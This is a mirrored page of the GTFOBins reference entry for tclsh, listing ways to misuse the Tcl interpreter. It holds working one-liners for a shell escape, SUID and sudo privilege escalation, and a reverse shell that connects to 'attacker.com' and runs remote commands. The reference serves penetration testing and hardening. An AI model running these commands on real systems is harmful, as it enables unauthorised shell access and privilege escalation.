This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-10-27 23:08:38 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
87270f9b55b032da830badd5eafe1e665e0bc0a5
GTFOBins.github.io
/
_gtfobins
/
tclsh.md
Emilio Pinna
dd337b5ddf
Adopt new function names
2018-10-05 18:55:38 +01:00
682 B
Raw
Blame
History
functions
functions
shell
non-interactive-reverse-shell
suid
sudo
code
tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
description
code
Run `nc -l -p 12345` on the attacker box to receive the shell.
export RHOST=attacker.com export RPORT=12345 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
code
./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr
code
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr